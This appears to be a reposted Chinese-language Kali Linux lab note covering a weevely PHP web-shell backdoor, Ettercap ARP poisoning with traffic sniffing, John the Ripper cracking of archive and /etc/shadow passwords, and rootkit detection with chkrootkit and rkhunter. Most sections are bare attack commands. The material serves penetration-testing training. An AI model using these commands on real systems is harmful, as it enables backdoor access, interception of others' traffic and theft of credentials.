12.持久性后门----Ettercap之ARP中毒----RAR/ZIP & linux密码破解----kali上检测rootkits

生成PHP shell

weevely generate 密码 /root/Desktop/404.php
靶机IP/404.php
weevely http://192.168.1.108/404.php 密码
下一步就是命令与执行了，比如ls

sysctl -w net.ipv4.ip_forward=1

图形版ettercap

target1 添加路由网关地址
target2 添加路由蓝方地址

tcpdump -i eth0 -n port 80 and host 蓝方地址

John The Ripper工具

cd Desktop
zip2john
rar2john Test.zip     美元符开头美元符结束
rar2john Test.zip > hash.txt
john --format=rar hash.txt

useradd -r user2
passwd user2
john /etc/shadow

chkrootkit & rkhunter

apt-get install chkrootkit
chkrootkit -h
chkrootkit

apt-get install rkhunter
rkhunter
rkhunter -c

原文地址：https://www.cnblogs.com/sec875/p/11366831.html